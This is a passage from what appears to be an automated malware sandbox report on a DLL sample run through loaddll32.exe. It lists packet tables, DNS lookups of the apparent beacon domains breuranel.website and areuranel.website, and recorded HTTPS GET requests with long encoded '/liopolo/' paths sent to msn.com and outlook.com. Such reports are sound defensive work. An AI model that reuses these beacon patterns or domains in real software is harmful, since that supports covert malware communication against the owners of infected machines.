                                                                                                          Oct 11, 2021 22:36:18.726766109 CEST4434977952.98.208.66192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.785830975 CEST49780443192.168.2.640.97.161.50
                                                                                                          Oct 11, 2021 22:36:18.785887957 CEST4434978040.97.161.50192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.786026955 CEST49780443192.168.2.640.97.161.50
                                                                                                          Oct 11, 2021 22:36:18.786667109 CEST49780443192.168.2.640.97.161.50
                                                                                                          Oct 11, 2021 22:36:18.786684990 CEST4434978040.97.161.50192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.294521093 CEST4434978040.97.161.50192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.294776917 CEST49780443192.168.2.640.97.161.50
                                                                                                          Oct 11, 2021 22:36:19.297009945 CEST49780443192.168.2.640.97.161.50
                                                                                                          Oct 11, 2021 22:36:19.297032118 CEST4434978040.97.161.50192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.297462940 CEST4434978040.97.161.50192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.299602985 CEST49780443192.168.2.640.97.161.50
                                                                                                          Oct 11, 2021 22:36:19.343142033 CEST4434978040.97.161.50192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.468770981 CEST4434978040.97.161.50192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.468847036 CEST4434978040.97.161.50192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.468961954 CEST49780443192.168.2.640.97.161.50
                                                                                                          Oct 11, 2021 22:36:19.470700026 CEST49780443192.168.2.640.97.161.50
                                                                                                          Oct 11, 2021 22:36:19.470731020 CEST4434978040.97.161.50192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.498827934 CEST49781443192.168.2.652.97.178.34
                                                                                                          Oct 11, 2021 22:36:19.498862028 CEST4434978152.97.178.34192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.498971939 CEST49781443192.168.2.652.97.178.34
                                                                                                          Oct 11, 2021 22:36:19.499624014 CEST49781443192.168.2.652.97.178.34
                                                                                                          Oct 11, 2021 22:36:19.499645948 CEST4434978152.97.178.34192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.594341040 CEST4434978152.97.178.34192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.594475031 CEST49781443192.168.2.652.97.178.34
                                                                                                          Oct 11, 2021 22:36:19.606277943 CEST49781443192.168.2.652.97.178.34
                                                                                                          Oct 11, 2021 22:36:19.606297016 CEST4434978152.97.178.34192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.606688023 CEST4434978152.97.178.34192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.614052057 CEST49781443192.168.2.652.97.178.34
                                                                                                          Oct 11, 2021 22:36:19.649470091 CEST4434978152.97.178.34192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.649558067 CEST4434978152.97.178.34192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.649651051 CEST49781443192.168.2.652.97.178.34
                                                                                                          Oct 11, 2021 22:36:19.651978970 CEST49781443192.168.2.652.97.178.34
                                                                                                          Oct 11, 2021 22:36:19.652009964 CEST4434978152.97.178.34192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.697753906 CEST49782443192.168.2.652.97.178.98
                                                                                                          Oct 11, 2021 22:36:19.697793961 CEST4434978252.97.178.98192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.697892904 CEST49782443192.168.2.652.97.178.98
                                                                                                          Oct 11, 2021 22:36:19.703511953 CEST49782443192.168.2.652.97.178.98
                                                                                                          Oct 11, 2021 22:36:19.703547001 CEST4434978252.97.178.98192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.796855927 CEST4434978252.97.178.98192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.796951056 CEST49782443192.168.2.652.97.178.98
                                                                                                          Oct 11, 2021 22:36:19.800255060 CEST49782443192.168.2.652.97.178.98
                                                                                                          Oct 11, 2021 22:36:19.800277948 CEST4434978252.97.178.98192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.800935984 CEST4434978252.97.178.98192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.803472996 CEST49782443192.168.2.652.97.178.98
                                                                                                          Oct 11, 2021 22:36:19.847250938 CEST4434978252.97.178.98192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.874670029 CEST4434978252.97.178.98192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.875168085 CEST4434978252.97.178.98192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.875250101 CEST49782443192.168.2.652.97.178.98
                                                                                                          Oct 11, 2021 22:36:19.876300097 CEST49782443192.168.2.652.97.178.98
                                                                                                          Oct 11, 2021 22:36:19.876322031 CEST4434978252.97.178.98192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.876384020 CEST49782443192.168.2.652.97.178.98
                                                                                                          Oct 11, 2021 22:36:19.876405954 CEST4434978252.97.178.98192.168.2.6

                                                                                                          UDP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Oct 11, 2021 22:35:35.229856014 CEST6426753192.168.2.68.8.8.8
                                                                                                          Oct 11, 2021 22:35:35.245790005 CEST53642678.8.8.8192.168.2.6
                                                                                                          Oct 11, 2021 22:35:36.111063957 CEST4944853192.168.2.68.8.8.8
                                                                                                          Oct 11, 2021 22:35:36.687268019 CEST6034253192.168.2.68.8.8.8
                                                                                                          Oct 11, 2021 22:35:36.708036900 CEST53603428.8.8.8192.168.2.6
                                                                                                          Oct 11, 2021 22:35:37.600009918 CEST6134653192.168.2.68.8.8.8
                                                                                                          Oct 11, 2021 22:35:57.504539967 CEST6026153192.168.2.68.8.8.8
                                                                                                          Oct 11, 2021 22:35:57.524563074 CEST53602618.8.8.8192.168.2.6
                                                                                                          Oct 11, 2021 22:35:58.419724941 CEST5606153192.168.2.68.8.8.8
                                                                                                          Oct 11, 2021 22:35:58.437235117 CEST53560618.8.8.8192.168.2.6
                                                                                                          Oct 11, 2021 22:36:17.590590954 CEST5406453192.168.2.68.8.8.8
                                                                                                          Oct 11, 2021 22:36:17.608792067 CEST53540648.8.8.8192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.361334085 CEST5281153192.168.2.68.8.8.8
                                                                                                          Oct 11, 2021 22:36:18.380968094 CEST53528118.8.8.8192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.529942036 CEST5529953192.168.2.68.8.8.8
                                                                                                          Oct 11, 2021 22:36:18.546534061 CEST53552998.8.8.8192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.767518044 CEST6374553192.168.2.68.8.8.8
                                                                                                          Oct 11, 2021 22:36:18.784348965 CEST53637458.8.8.8192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.477575064 CEST5005553192.168.2.68.8.8.8
                                                                                                          Oct 11, 2021 22:36:19.494900942 CEST53500558.8.8.8192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.675849915 CEST6137453192.168.2.68.8.8.8
                                                                                                          Oct 11, 2021 22:36:19.693698883 CEST53613748.8.8.8192.168.2.6
                                                                                                          Oct 11, 2021 22:36:38.823678970 CEST5181853192.168.2.68.8.8.8
                                                                                                          Oct 11, 2021 22:36:38.844248056 CEST53518188.8.8.8192.168.2.6
                                                                                                          Oct 11, 2021 22:36:40.759514093 CEST5662853192.168.2.68.8.8.8
                                                                                                          Oct 11, 2021 22:36:40.780013084 CEST53566288.8.8.8192.168.2.6

                                                                                                          DNS Queries

                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                          Oct 11, 2021 22:35:35.229856014 CEST192.168.2.68.8.8.80x6aaeStandard query (0)msn.comA (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:35:36.111063957 CEST192.168.2.68.8.8.80x3e28Standard query (0)www.msn.comA (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:35:36.687268019 CEST192.168.2.68.8.8.80x7b05Standard query (0)msn.comA (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:35:37.600009918 CEST192.168.2.68.8.8.80x28e1Standard query (0)www.msn.comA (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:35:57.504539967 CEST192.168.2.68.8.8.80x9ef7Standard query (0)breuranel.websiteA (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:35:58.419724941 CEST192.168.2.68.8.8.80x42f7Standard query (0)breuranel.websiteA (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:17.590590954 CEST192.168.2.68.8.8.80x4c3eStandard query (0)outlook.comA (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:18.361334085 CEST192.168.2.68.8.8.80xd19aStandard query (0)www.outlook.comA (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:18.529942036 CEST192.168.2.68.8.8.80x1f03Standard query (0)outlook.office365.comA (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:18.767518044 CEST192.168.2.68.8.8.80x7ff6Standard query (0)outlook.comA (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:19.477575064 CEST192.168.2.68.8.8.80x382dStandard query (0)www.outlook.comA (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:19.675849915 CEST192.168.2.68.8.8.80xa1ebStandard query (0)outlook.office365.comA (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:38.823678970 CEST192.168.2.68.8.8.80xa792Standard query (0)areuranel.websiteA (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:40.759514093 CEST192.168.2.68.8.8.80x5f89Standard query (0)areuranel.websiteA (IP address)IN (0x0001)

                                                                                                          DNS Answers

                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                          Oct 11, 2021 22:35:35.245790005 CEST8.8.8.8192.168.2.60x6aaeNo error (0)msn.com13.82.28.61A (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:35:36.128932953 CEST8.8.8.8192.168.2.60x3e28No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                          Oct 11, 2021 22:35:36.708036900 CEST8.8.8.8192.168.2.60x7b05No error (0)msn.com13.82.28.61A (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:35:37.618123055 CEST8.8.8.8192.168.2.60x28e1No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                          Oct 11, 2021 22:35:57.524563074 CEST8.8.8.8192.168.2.60x9ef7Name error (3)breuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:35:58.437235117 CEST8.8.8.8192.168.2.60x42f7Name error (3)breuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:17.608792067 CEST8.8.8.8192.168.2.60x4c3eNo error (0)outlook.com40.97.161.50A (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:17.608792067 CEST8.8.8.8192.168.2.60x4c3eNo error (0)outlook.com40.97.156.114A (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:17.608792067 CEST8.8.8.8192.168.2.60x4c3eNo error (0)outlook.com40.97.160.2A (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:17.608792067 CEST8.8.8.8192.168.2.60x4c3eNo error (0)outlook.com40.97.128.194A (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:17.608792067 CEST8.8.8.8192.168.2.60x4c3eNo error (0)outlook.com40.97.164.146A (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:17.608792067 CEST8.8.8.8192.168.2.60x4c3eNo error (0)outlook.com40.97.153.146A (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:17.608792067 CEST8.8.8.8192.168.2.60x4c3eNo error (0)outlook.com40.97.116.82A (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:17.608792067 CEST8.8.8.8192.168.2.60x4c3eNo error (0)outlook.com40.97.148.226A (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:18.380968094 CEST8.8.8.8192.168.2.60xd19aNo error (0)www.outlook.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:18.380968094 CEST8.8.8.8192.168.2.60xd19aNo error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:18.380968094 CEST8.8.8.8192.168.2.60xd19aNo error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:18.380968094 CEST8.8.8.8192.168.2.60xd19aNo error (0)outlook.ms-acdc.office.comHHN-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:18.380968094 CEST8.8.8.8192.168.2.60xd19aNo error (0)HHN-efz.ms-acdc.office.com52.98.199.194A (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:18.380968094 CEST8.8.8.8192.168.2.60xd19aNo error (0)HHN-efz.ms-acdc.office.com52.98.214.82A (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:18.380968094 CEST8.8.8.8192.168.2.60xd19aNo error (0)HHN-efz.ms-acdc.office.com40.101.124.2A (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:18.380968094 CEST8.8.8.8192.168.2.60xd19aNo error (0)HHN-efz.ms-acdc.office.com52.98.152.194A (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:18.546534061 CEST8.8.8.8192.168.2.60x1f03No error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:18.546534061 CEST8.8.8.8192.168.2.60x1f03No error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:18.546534061 CEST8.8.8.8192.168.2.60x1f03No error (0)outlook.ms-acdc.office.comFRA-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:18.546534061 CEST8.8.8.8192.168.2.60x1f03No error (0)FRA-efz.ms-acdc.office.com52.98.208.66A (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:18.546534061 CEST8.8.8.8192.168.2.60x1f03No error (0)FRA-efz.ms-acdc.office.com52.97.212.34A (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:18.546534061 CEST8.8.8.8192.168.2.60x1f03No error (0)FRA-efz.ms-acdc.office.com52.97.157.162A (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:18.784348965 CEST8.8.8.8192.168.2.60x7ff6No error (0)outlook.com40.97.161.50A (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:18.784348965 CEST8.8.8.8192.168.2.60x7ff6No error (0)outlook.com40.97.156.114A (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:18.784348965 CEST8.8.8.8192.168.2.60x7ff6No error (0)outlook.com40.97.160.2A (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:18.784348965 CEST8.8.8.8192.168.2.60x7ff6No error (0)outlook.com40.97.128.194A (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:18.784348965 CEST8.8.8.8192.168.2.60x7ff6No error (0)outlook.com40.97.164.146A (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:18.784348965 CEST8.8.8.8192.168.2.60x7ff6No error (0)outlook.com40.97.153.146A (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:18.784348965 CEST8.8.8.8192.168.2.60x7ff6No error (0)outlook.com40.97.116.82A (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:18.784348965 CEST8.8.8.8192.168.2.60x7ff6No error (0)outlook.com40.97.148.226A (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:19.494900942 CEST8.8.8.8192.168.2.60x382dNo error (0)www.outlook.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:19.494900942 CEST8.8.8.8192.168.2.60x382dNo error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:19.494900942 CEST8.8.8.8192.168.2.60x382dNo error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:19.494900942 CEST8.8.8.8192.168.2.60x382dNo error (0)outlook.ms-acdc.office.comHHN-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:19.494900942 CEST8.8.8.8192.168.2.60x382dNo error (0)HHN-efz.ms-acdc.office.com52.97.178.34A (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:19.494900942 CEST8.8.8.8192.168.2.60x382dNo error (0)HHN-efz.ms-acdc.office.com52.97.135.82A (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:19.494900942 CEST8.8.8.8192.168.2.60x382dNo error (0)HHN-efz.ms-acdc.office.com52.98.208.66A (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:19.494900942 CEST8.8.8.8192.168.2.60x382dNo error (0)HHN-efz.ms-acdc.office.com52.98.208.50A (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:19.693698883 CEST8.8.8.8192.168.2.60xa1ebNo error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:19.693698883 CEST8.8.8.8192.168.2.60xa1ebNo error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:19.693698883 CEST8.8.8.8192.168.2.60xa1ebNo error (0)outlook.ms-acdc.office.comHHN-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:19.693698883 CEST8.8.8.8192.168.2.60xa1ebNo error (0)HHN-efz.ms-acdc.office.com52.97.178.98A (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:19.693698883 CEST8.8.8.8192.168.2.60xa1ebNo error (0)HHN-efz.ms-acdc.office.com52.97.183.162A (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:19.693698883 CEST8.8.8.8192.168.2.60xa1ebNo error (0)HHN-efz.ms-acdc.office.com52.97.223.66A (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:19.693698883 CEST8.8.8.8192.168.2.60xa1ebNo error (0)HHN-efz.ms-acdc.office.com52.97.151.98A (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:38.844248056 CEST8.8.8.8192.168.2.60xa792Name error (3)areuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:40.780013084 CEST8.8.8.8192.168.2.60x5f89Name error (3)areuranel.websitenonenoneA (IP address)IN (0x0001)

                                                                                                          HTTP Request Dependency Graph

                                                                                                          • msn.com
                                                                                                          • outlook.com
                                                                                                          • www.outlook.com
                                                                                                          • outlook.office365.com

                                                                                                          HTTPS Proxied Packets

                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          0192.168.2.64976113.82.28.61443C:\Windows\System32\loaddll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-11 20:35:35 UTC0OUTGET /mail/liopolo/g1XXBsAxpar6N9kYzRnrf3/OQX2uNrM13y9W/Ob_2BksA/x8bQpkLjYsruIhPFJi3ZErA/tgPZIh6fnf/T9Sy6miArqkO107Ts/8FGy1p_2BKcs/IbQATX6Vpot/p9H1S_2FBpU5gj/XH9RZi7pSy90EfKCN0xoX/QAyaPWXD19YFLug2/I6ErSp8Uq8hZ5g3/WwbSra7jr8/n3VI4u.jre HTTP/1.1
                                                                                                          Cache-Control: no-cache
                                                                                                          Connection: Keep-Alive
                                                                                                          Pragma: no-cache
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                          Host: msn.com
                                                                                                          2021-10-11 20:35:36 UTC0INHTTP/1.1 301 Moved Permanently
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Location: https://www.msn.com/mail/liopolo/g1XXBsAxpar6N9kYzRnrf3/OQX2uNrM13y9W/Ob_2BksA/x8bQpkLjYsruIhPFJi3ZErA/tgPZIh6fnf/T9Sy6miArqkO107Ts/8FGy1p_2BKcs/IbQATX6Vpot/p9H1S_2FBpU5gj/XH9RZi7pSy90EfKCN0xoX/QAyaPWXD19YFLug2/I6ErSp8Uq8hZ5g3/WwbSra7jr8/n3VI4u.jre
                                                                                                          Server: Microsoft-IIS/8.5
                                                                                                          X-Powered-By: ASP.NET
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Date: Mon, 11 Oct 2021 20:35:35 GMT
                                                                                                          Connection: close
                                                                                                          Content-Length: 371
                                                                                                          2021-10-11 20:35:36 UTC0INData Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 6d 61 69 6c 2f 6c 69 6f 70 6f 6c 6f 2f 67 31 58 58 42 73 41 78 70 61 72 36 4e 39 6b 59 7a 52 6e 72 66 33 2f 4f 51 58 32 75 4e 72 4d 31 33 79 39 57 2f 4f 62 5f 32 42 6b 73 41 2f 78 38 62 51 70 6b 4c 6a 59 73 72 75 49 68 50 46 4a 69 33 5a 45 72 41 2f 74 67 50 5a 49 68 36 66 6e 66 2f 54 39 53 79 36 6d 69 41 72 71 6b 4f 31 30 37 54 73 2f 38 46 47 79 31 70 5f 32 42 4b 63 73 2f 49 62 51 41
                                                                                                          Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/g1XXBsAxpar6N9kYzRnrf3/OQX2uNrM13y9W/Ob_2BksA/x8bQpkLjYsruIhPFJi3ZErA/tgPZIh6fnf/T9Sy6miArqkO107Ts/8FGy1p_2BKcs/IbQA


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          1192.168.2.64976313.82.28.61443C:\Windows\System32\loaddll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-11 20:35:37 UTC1OUTGET /mail/liopolo/Y72qNipk37Ef6u/yMdIBjS0TF0zySEk6QqaV/RM1KEI93T2ySqpPS/3a9271HiYU26bKL/CuRYvP0IHiJcR1Om5j/v_2BngoS3/PTV0r6xFeitoJIhrqq8c/AEX9VsNnHNbr2POb3_2/FNC3movbIQSikKNXB2GV0p/4fgFX9c16BwP9/WREoUF91/5ZKv3_2F1kKAcsEj_2FjVau/em3Y7wQlz5/TIVYBPW_2/FO9688N.jre HTTP/1.1
                                                                                                          Cache-Control: no-cache
                                                                                                          Connection: Keep-Alive
                                                                                                          Pragma: no-cache
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                          Host: msn.com
                                                                                                          2021-10-11 20:35:37 UTC1INHTTP/1.1 301 Moved Permanently
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Location: https://www.msn.com/mail/liopolo/Y72qNipk37Ef6u/yMdIBjS0TF0zySEk6QqaV/RM1KEI93T2ySqpPS/3a9271HiYU26bKL/CuRYvP0IHiJcR1Om5j/v_2BngoS3/PTV0r6xFeitoJIhrqq8c/AEX9VsNnHNbr2POb3_2/FNC3movbIQSikKNXB2GV0p/4fgFX9c16BwP9/WREoUF91/5ZKv3_2F1kKAcsEj_2FjVau/em3Y7wQlz5/TIVYBPW_2/FO9688N.jre
                                                                                                          Server: Microsoft-IIS/8.5
                                                                                                          X-Powered-By: ASP.NET
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Date: Mon, 11 Oct 2021 20:35:37 GMT
                                                                                                          Connection: close
                                                                                                          Content-Length: 398
                                                                                                          2021-10-11 20:35:37 UTC2INData Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 6d 61 69 6c 2f 6c 69 6f 70 6f 6c 6f 2f 59 37 32 71 4e 69 70 6b 33 37 45 66 36 75 2f 79 4d 64 49 42 6a 53 30 54 46 30 7a 79 53 45 6b 36 51 71 61 56 2f 52 4d 31 4b 45 49 39 33 54 32 79 53 71 70 50 53 2f 33 61 39 32 37 31 48 69 59 55 32 36 62 4b 4c 2f 43 75 52 59 76 50 30 49 48 69 4a 63 52 31 4f 6d 35 6a 2f 76 5f 32 42 6e 67 6f 53 33 2f 50 54 56 30 72 36 78 46 65 69 74 6f 4a 49 68 72 71
                                                                                                          Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/Y72qNipk37Ef6u/yMdIBjS0TF0zySEk6QqaV/RM1KEI93T2ySqpPS/3a9271HiYU26bKL/CuRYvP0IHiJcR1Om5j/v_2BngoS3/PTV0r6xFeitoJIhrq


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          2192.168.2.64977740.97.161.50443C:\Windows\System32\loaddll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-11 20:36:18 UTC2OUTGET /signup/liopolo/jxoib0nr0xisi2eIVGGk/Kbu0JPj_2B3fu4js1D7/jxotlkFcz1f8cNsX_2FadD/dwubn6X7zOguR/iMUlQrL6/BThA9h9Clk92iCx0cavsxkl/4fdI4nS6Sj/yihCHX4r_2Bf1xsG_/2BUKQzRucv09/S5UJEFULHgR/sYI2tOST5SUskI/G4qeFHRMNjcHJ2CVjy9gn/wxByXeY0/co.jre HTTP/1.1
                                                                                                          Cache-Control: no-cache
                                                                                                          Connection: Keep-Alive
                                                                                                          Pragma: no-cache
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                          Host: outlook.com
                                                                                                          2021-10-11 20:36:18 UTC3INHTTP/1.1 301 Moved Permanently
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Location: https://www.outlook.com/signup/liopolo/jxoib0nr0xisi2eIVGGk/Kbu0JPj_2B3fu4js1D7/jxotlkFcz1f8cNsX_2FadD/dwubn6X7zOguR/iMUlQrL6/BThA9h9Clk92iCx0cavsxkl/4fdI4nS6Sj/yihCHX4r_2Bf1xsG_/2BUKQzRucv09/S5UJEFULHgR/sYI2tOST5SUskI/G4qeFHRMNjcHJ2CVjy9gn/wxByXeY0/co.jre
                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                          request-id: 6e1f0e87-1066-4faf-c046-ce5e26254186
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          X-FEServer: MWHPR11CA0029
                                                                                                          X-RequestId: 628d9d53-49e4-4ca4-94c4-b11208e638b5
                                                                                                          MS-CV: hw4fbmYQr0/ARs5eJiVBhg.0
                                                                                                          X-Powered-By: ASP.NET
                                                                                                          X-FEServer: MWHPR11CA0029
                                                                                                          Date: Mon, 11 Oct 2021 20:36:18 GMT
                                                                                                          Connection: close
                                                                                                          Content-Length: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          3192.168.2.64977852.98.199.194443C:\Windows\System32\loaddll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-11 20:36:18 UTC3OUTGET /signup/liopolo/jxoib0nr0xisi2eIVGGk/Kbu0JPj_2B3fu4js1D7/jxotlkFcz1f8cNsX_2FadD/dwubn6X7zOguR/iMUlQrL6/BThA9h9Clk92iCx0cavsxkl/4fdI4nS6Sj/yihCHX4r_2Bf1xsG_/2BUKQzRucv09/S5UJEFULHgR/sYI2tOST5SUskI/G4qeFHRMNjcHJ2CVjy9gn/wxByXeY0/co.jre HTTP/1.1
                                                                                                          Cache-Control: no-cache
                                                                                                          Connection: Keep-Alive
                                                                                                          Pragma: no-cache
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                          Host: www.outlook.com
                                                                                                          2021-10-11 20:36:18 UTC4INHTTP/1.1 301 Moved Permanently
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
